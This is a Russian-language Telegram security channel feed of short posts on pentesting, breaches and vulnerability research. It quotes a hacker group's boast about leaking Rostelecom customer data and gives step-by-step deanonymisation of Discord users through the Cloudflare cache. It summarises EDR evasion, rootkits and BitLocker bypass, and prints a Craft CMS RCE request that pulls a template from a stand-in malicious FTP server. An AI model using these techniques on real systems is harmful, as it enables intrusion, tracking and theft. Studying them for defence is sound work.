Cybred
10.8K subscribers
404 photos
34 videos
94 files
632 links
Download Telegram
Forwarded from Life-Hack - Хакер
Наш бесплатный курс "Тестирование на проникновение" подошел к концу. Вот полный список статей, которые помогут вам начать свой путь в #Pentest.

Моделирование атаки - тестрирование на проникновение.
Основные этапы тестирования.
Сбор информации: 1 Часть.
Сбор информации: 2 Часть.
Сбор информации: 3 Часть.
Обнаружение уязвимостей.
Подбор паролей.

Обратные оболочки и полезные нагрузки.
Эксплуатация уязвимостей: 1 Часть.
Эксплуатация уязвимостей: 2 Часть.
Уклонение от средств защиты: 1 Часть.
Уклонение от средств защиты: 2 Часть.
Уклонение от средств защиты: 3 Часть.
С2 (Command and Control) сервер.

Основы Active Directory: 1 Часть.
Основы Active Directory: 2 Часть.
Kerberos, NTLM, DNS, LDAP.
Пользовательские и машинные учетные записи.
Права и привилегии в Active Directory.
Небезопасные права доступа ACL.
Active Directory Domain Enumeration

Bloodhound
AS-REP Roasting
Kerberoasting
Неограниченное делегирование.
Ограниченное делегирование.
Ограниченное делегирование на основе ресурсов.
DCShadow.

Pass-the-hash
Password Spray
Windows Server Update Services (WSUS)
System Center Configuration Manager (SCCM)
Взлом MSSQL
Responder
Netexec

Крадем учетные данные Windows
Zerologon
PetitPotam
Skeleton Key
RouterSploit
Получение DA через принтер
DCSync

SIDHistory
AdminSDHolder
Silver Ticket
Golden Ticket
Diamond Ticket
Sapphire Ticket

Не забывайте делиться нашим бесплатным курсом "Тестирование на проникновение"!

#статья@haccking #обучениеPentest@haccking #AD

LH | Новости | Курсы | OSINT
Ростелеком взломан

Хакеры из Silent Crow, которые в прошлый раз вынесли Росреестр, поделились своими новыми достижениями.

Пора подвести итоги нашего недавнего приключения в сетях одной из крупнейших компаний РФ — "Ростелеком". Да, мы были там достаточно долго, вынесли прилично, и теперь делимся с вами некоторыми артефактами.


В процессе выгрузки данных они были замечены местным SOC, который попытался несколько раз выбить из компании, но его попытки оказались тщетными.

Сразу хотим выразить "респект" отделу информационной безопасности Ростелекома. Эти ребята пытались выбить нас из сети четыре раза. Работа SOC была захватывающей, но бессмысленной. На второй месяц мы уже чувствовали себя у них штатными сотрудниками.


В данный момент был опубликован только один дамп, в которой входит 154 тыс. уникальных адресов почты и 101 тыс. уникальных номеров телефонов. Но сегодня будут также опубликованы и другие дампы.
Сегодня мы сольем несколько ресурсов, а именно базу данных "Закупки ПАО Ростелеком", базу данных заявок клиентов с основного сайта "ПАО Ростелеком" — номера телефонов, адреса, запросы, и, конечно, привычные: "Срочно почините интернет!", который всё равно тормозит.


Подводя итоги, Silent Crow призывают ожидать новые сливы.
Ожидайте интересный новостей, следующий слив будет крупным.
CVE-2024-49138-POC

❗️ CVE-2024-49138 is an elevation of privilege vulnerability in the Windows Common Log File System (CLFS) driver, potentially allowing attackers to gain unauthorized access to system resources.

This vulnerability can be exploited by crafting malicious CLFS log files, enabling attackers to execute privileged actions within the operating system.


Tested on Windows 11 23h2.
Forwarded from елуп
Интерн-шитпостер нашёл критическую уязвимость, которую не замечали больше 15 лет. Вот хронология этой истории:

> В компании, о которой пойдёт речь, есть сервис с древней системой аутентификации, которую никто не трогает, потому что она написана на COBOL. Это древний язык программирования, который используют с 1959 года. Последний человек, который понимал, что там происходит, уехал в Перу проводить занятия по йоге
> Стажёр, который пришёл в компанию на лето, посчитал, что его старшие коллеги оставляют слишком скучные описания коммитов, и решил их разнообразить
> Сначала он оставлял весёлые описания коммитов в более свежих кодовых базах. Вот примеры его пометок:

// This function is older than me and probably pays taxes
// TODO: Ask if this while loop has health insurance
// Here lies Sarah's hopes and dreams (2019-2022), killed by this recursive call

> Но затем он добрался до той самой системы аутентификации и оставил там такие пометки:

// yo why this token validation looking kinda thicc though
// fr fr no cap this base64 decode bussin
// wait... hold up... this ain't bussin at all

> В итоге этот интерн нашёл уязвимость в проверке токенов, которая была там с первого срока Обамы, и отправил тикет в Jira с подписью: Auth be acting mad sus rn no cap frfr (Critical Security Issue)

> Теперь сотрудникам компании придётся объяснять, почему в их квартальном аудите безопасности есть слова no cap frfr, а интерн получит приглашение устроиться на постоянную основу

Небольшая сноска, чтобы разобраться с зумерскими сокращениями:

• thicc — сочная/толстая попа
• fr — for real, реально
• no cap — не пизжу, правда
• bussin — пиздато
• sus — подозрительно
• rn — прямо сейчас
Chrome Extension Security

Этот сайт — компиляция моих идей и знаний, собранных с начала 2024 года в ходе длительных экспериментов с популярными расширениями.

На сегодняшний день не существует единого ресурса, который бы подробно рассматривал эту важную тему, несмотря на широкое распространение расширений, взаимодействующих с конфиденциальными данными и операциями.


Гайд по безопасности расширений: что, где и как искать

1. Introduction
2. Basics
Before Start
Creating Your Own Extension
Extension Structure
Storage
Native Messages
3. Attack
Exploit addEventListener
Exploit Messages
Open Closed Shadow DOM
Clickjacking
Unsafe storage to UXSS
4. More
CVE-2024-10229
Бесплатный курс по форензике

Мы в C5W стремимся к тому, чтобы все больше людей могли присоединиться к сфере цифровой криминалистики и реагирования на инциденты (DFIR). Поэтому мы рады сообщить, что наш основной курс по DFIR теперь совершенно БЕСПЛАТЕН для всех!

Этот курс призван устранить барьеры и сделать DFIR доступным для студентов, профессионалов и всех, кто интересуется этой интересной областью.


1. Digital Forensics Concepts
2. Working With Virtual Hard Disk
3. Evidence Acquisition Under Windows
4. Working With Ftk Imager
5. Computer Data Representation
6. Working With Files
7. File System And Data Carving
8. Working With Time Zones And Dates
9. Working With Autopsy
10. Writing Forensic Reports

Всего больше 216 лекций.
Как мгновенно определить геолокацию пользователя в Discord, Signal, и многих других сервисах

В этом может помочь Cloudflare — дата-центры которого находятся в более 330 городах мира, в 120+ странах. Сегодня это самый крупный в мире CDN, кэширование которого может выдать пользователя.

Алгоритм на примере Discord выглядит следующим образом:
1. Заходим в Discord, ставим новую аватарку. Она грузится на URL вида https://cdn.discordapp.com/avatars/{user_id}/{avatar_hash}, который использует Cloudflare.
Эта картинка изначально не закэширована ни в одном ДЦ.

2. Заставляем устройство нашей цели загрузить эту картинку. Для этого отправляем любое сообщение, либо запрос в друзья. Пользователю придет уведомление с пушом, в пуше будет предзагружена картинка.
Картинка кэшируется на ближайшем к пользователю ДЦ.

3. Начинаем "простукивать" каждый ДЦ на наличие этой картинки. Это можно сделать с помощью Cloudflare Workers, которые позволяют отправлять запросы из сети Cloudflare, из конкретного ДЦ.
Если сервер ответит со статусом кэширования HIT — это будет значить, что пользователь находится примерно там же, где и сервер Cloudflare.

В чем-то похоже на обычный IP-логгер, но главный плюс в том, что пользователь никуда не нажимает, а его местоположение ликается еще до того, как он разблокирует смартфон.

Способ работал не только с Discord, но и Signal, и Twitter, без взаимодействия с пользователем. Но до тех пор, пока Cloudflare не закрыл третий пункт.
1
Cybred
Баг, через который можно угнать все машины от Kia У Kia есть приложение Connect, через которое можно узнать где находится твоя машина, посигналить, а еще открыть ее и завести. Но как оно понимает, что это твоя машина, а не чужая? После того, как ты купил…
Hacking Subaru: Tracking and Controlling Cars via the STARLINK Admin

Очередная история про взломы автомобилей с доступом ко всему парку машин.

Исследователь нашел в интернете личный кабинет для владельцев автомобилей Subaru с нюансами:
чтобы "восстановить" доступ к ЛК владельца любой машины, достаточно указать его почту и новый пароль
попап с вводом обязательного 2FA можно удалить через код элемента — никакого 2FA на самом деле нет
дистанционно можно следить за всеми машинами, открывать их и заводить

На скриншоте карта с историей передвижений одного из автомобилистов, которые собирает компания — отказаться от сбора этих данных официально никак нельзя, кроме покупки старой машины.
How We Cracked a 512-Bit DKIM Key for Less Than $8 in the Cloud

Пошаговый гайд по тому, как на основе слабых (<1024 бит) публичных ключей DKIM восстановить приватные (спойлер: дешево и быстро). Как восстановил — можно начать рассылать письма, как будто ты легитимный владелец чужого домена.

В статье получили контроль над redfin.com и заслали письма нескольким провайдерам, — Yahoo, Mailfence и Tuta приняли подпись.
How an obscure PHP footgun led to RCE in Craft CMS

Любой сайт на PHP может быть уязвим к RCE, если использует дефолтный конфиг. Как, например, это случилось в Craft CMS, где приложение, неожиданно для всех, начало принимать аргументы командной строки из GET-параметров

GET /?--templatesPath=ftp://a:a@our.malicious.server:2121/ HTTP/1.1
Host: localhost:8000

...

HTTP/1.1 200 OK
Server: nginx

uid=82(www-data) gid=82(www-data) groups=82(www-data) Array


Дело в том, что скрипт, отвечающий за маршрутизацию, при обращении проверял, не переданы ли $_SERVER['argc'] и $_SERVER['argv'] (аргументы командной строки). На тот случай, если он запускается кем-то вручную из терминала.

Однако благодаря включенной по дефолту фиче register_argc_argv, эти аргументы можно передать просто GET-параметрами. Что и случилось, — ресерчер передал в качестве --templatesPath путь к шаблону на собственном сервере, а приложение, думая, что этот параметр передан из CLI, подгрузило вредоносный темплейт.
Windows BitLocker — Screwed without a Screwdriver

Топ-доклад с недавнего 38с3 (о котором я писал тут), рассказали о самом простом, на сегодняшний день, способе обойти Bitlocker.

Ваш ноутбук был украден. Он работает под управлением Windows 11, полностью обновлен, работает со включенным шифрованием устройства (BitLocker) и Secure Boot. Ваши данные в безопасности, верно? Как бы не так!


Существует атака bitpixie, суть которой проста: вызвать ошибку при загрузке Windows и в режиме восстановления прочитать ключ для расшифровки битлокера, который Bootloader забыл затереть в памяти. Она известна как CVE-2023-24932 уже два года, и Microsoft ее запатчила.

Кроме того, Secure Boot проверяет, чтобы загрузчик был подписан Microsoft, и не дает подсунуть что-то левое. Зато дает возможность даунгрейднуть новую версию загрузчика на уязвимую, и эксплуатировать старый баг с чтением из памяти.

Ничего разбирать не нужно, — достаточно иметь под рукой LAN кабель
(чтобы прикинуться TFTP PXE и отправить "апдейт"), второй нотбук (для всех манипуляций), и прямые руки — диск будет расшифрован.

Актуально для многих версий Windows, заканчивая последними сборками Windows 11. Единственное спасение — сложный хотфикс через ручное обновление серта UEFI, — автоматического исправления на сегодня нет.
1
Breaking Down Multipart Parsers: File upload validation bypass

Пачка новых обходов на аплоад файлов под популярные балансеры, файерволы и фреймворки.

По сути, ни один парсер multipart/form-data не соответствуют спецификации, и когда дело доходит до проверки имен файлов или контента, загружаемого пользователями, всегда есть множество способов обойти проверку.


Все построено на обмане встроенных парсеров.

Why do we need to validate files being uploaded?
Understanding Multipart Form-Data: Specifications and Peculiarities
What's the Boundary Strings?
Content-Disposition
Additional Headers Within Parts
Bypass #0: urlencoded in multipart
Bypass #1: duplicated name parameter
Bypass #1.1: duplicated filename parameter
Bypass #1.2: duplicated Content-Disposition
Bypass #2: breaking the CRLF seuqences
Bypass #3: removing double quotes
Bypass #4: missing closing boundary string
Bypass #5: filename*=utf-8'' in request
⚠️ PHP version in screenshots
Bypass OpenResty Lua multipart parsers
Duplicated filename parameter
Breaking CRLF sequence
Removing doublequotes on filename parameter
Bypass Nodejs and Busboy
Bypass file upload in Python Flask
Bypass FortiWeb WAF
Bypass Barracuda WAF
Bypass HAProxy ACL
This is the ACL
Bypass AWS WAF, Lambda
ModSecurity Multipart Parser
Conclusions
Silently Install Chrome Extension For Persistence

Я занимаюсь Red Team 10 лет и сегодня расскажу, как мне удалось найти способ максимально скрытно установить расширение для Chrome с обходом всех IOC, известных в настоящее время.


Преимущества:
не использует командную строку
оставляет реестр нетронутым
может быть установлен с открытым браузером
стабилен и сохраняет постоянство

research // poc
Malware Analysis Series

Malware Analysis Series — это цикл статей по анализу вредоносных программ, цель которых обучить реверс-инжинирингу на реальных примерах.

Мы начнем с самых простых вредоносов и постепенно перейдем к более сложным, затрагивая как можно больше различных аспектов.

По мере необходимости я расскажу также смежные темы, такие как COM, криптография, IDC/IDA Python и другие ключевые технологии, которые помогут читателям глубже понять суть анализа вредоносного кода.


MAS_1
MAS_2
MAS_3
MAS_4
MAS_5
MAS_6
MAS_7
MAS_8
MAS_9
MAS_10

Выпуски публикуются с 2021 года.
This media is not supported in your browser
VIEW IN TELEGRAM
ArgFuscator

ArgFuscator — это опенсорсное приложение, которое помогает генерировать обфусцированные пейлоады для командной строки.

Успешная обфускация помешает таким защитным мерам, как антивирусы и EDR, а в некоторых случаях и вовсе обойдет обнаружение.


На видео пример обхода Windows Defender.
1
The Art of Linux Kernel Rootkits

Глубокое погружение в мир руткитов режима ядра Linux.

Руткит — это вредонос, цель которого — сохранять постоянство в системе, оставаясь при этом полностью незамеченным — скрывать процессы, каталоги и так далее.

Это делает обнаружение руткитов очень сложным, а уничтожение - еще сложнее, так как они ориентированы на максимальную скрытность. Руткит изменяет поведение системы по умолчанию на то, которое ему нужно.


О принципе их работы со сниппетами кода и принципами обнаружения.

1. What is a rootkit?
1.1 - What is a kernel? Differences between userland and kernel land.
1.2 - What is a system call (Syscalls)?
1.3 - Userland rootkits.
1.4 - Kernel land rootkits.

2. Modern hooking techniques
2.1 - ftrace
2.2 - kprobe
2.3 - eBPF

3. LKM rootkit detection
3.1 - sysfs
3.2 - procfs
3.3 - logs
3.4 - Rootkit detection with eBPF Tracepoints

4. Make an LKM rootkit visible
5. Making an LKM rootkit completely useless
6. Hiding an LKM functions from tracing and /proc/kallsyms
7. Persistence with LKM Rootkit even after reboot machine
8. Protecting LKM Rootkits against LKM Rootkit hunters
9. The power of eBPF in detecting rootkits
10. Resources
11. Final Considerations
Forwarded from S.E.Book
👩‍💻 Attacking Nginx.

Nginx — это веб-сервер, на котором работает треть всех сайтов в мире. Но если забыть или проигнорировать некоторые ошибки в настройках, можно стать отличной мишенью для атакующих:

Missing Root Location in Nginx Configuration:
- Explanation;
- The Missing Root Location Issue.

Attack Scenario: Exploiting the Missing Root Location:
- Mitigating the Risk.

Unsafe Path Restriction in Nginx:
- Explanation;
- Potential Bypass Techniques;
- Attack Scenario: Exploiting Path Restriction Bypass;
- Mitigation Strategies.

Unsafe variable use / HTTP Request Splitting:
- Unsafe Use of Variables: $uri and $document_uri;
- Regex Vulnerabilities;
- Safe Configuration;
- Attack Scenarios and Detection Techniques;
- CRLF Injection and HTTP Request Splitting;
- Bypassing Path Restrictions Using Encoded Characters;
- Examples of Vulnerable Configurations.

Raw Backend Response Reading:
- Example Scenario: Exposing Raw Backend Responses;
- Example uWSGI Application;
- Nginx Configuration;
- Example Invalid HTTP Request;
- Example Output for Invalid Request;
- Attack Scenario;
- Mitigation Strategies.

merge_slashes set to off:
- merge_slashes Directive;
- Malicious Response Headers;
- map Directive Default Value;
- DNS Spoofing Vulnerability;
- proxy_pass and internal Directives.

proxy_set_header Upgrade & Connection:
- Vulnerable Configuration;
- Vulnerability;
- Attack Scenario;
- Mitigation;
- Additional Attack Scenarios and Commands.

#Nginx
Please open Telegram to view this post
VIEW IN TELEGRAM
Как мы заработали $50 000 на взломе цепочки поставок

Вместо того чтобы конкурировать дальше, мы решили работать вместе. Нашей целью стало выявить все возможные типы уязвимостей в этой системе: IDOR, SQL-инъекции, XSS, мисконфиги OAuth, Dependency Confusion, SSRF, RCE… Мы находили их, отправляли отчёты и получали вознаграждения.

Но одна мечта оставалась недостижимой: найти "Исключительную Уязвимость" — настолько критическую, что её вознаграждение выходило бы за рамки стандартных выплат. Это стало для нас главным вызовом.

И вот это история о том, как мы со Snorlhax наконец этого добились. Используя атаку на цепочку поставок, позволявшую выполнить RCE на компьютерах разработчиков, в сборочных процессах и на продакшен-серверах, мы получили выплату в $50 500.


Вот как это было.
В Burp Suite нативно внедрили AI

На деле просто добавили методы для работы с языковой моделью Portswigger через Montoya API, чтобы можно было интегрировать LLM в собственные расширения.

Минусов больше, чем плюсов:
— доступно только в платной версии Burp
— все завязано на походы в API Portswigger
— нельзя подключать локальные модели
— каждый вызов нужно оплачить кредитами

Месяц назад я писал о первом бесплатном AI-расширении burpference, которое успели релизнуть гораздо раньше и бесплатно для всех.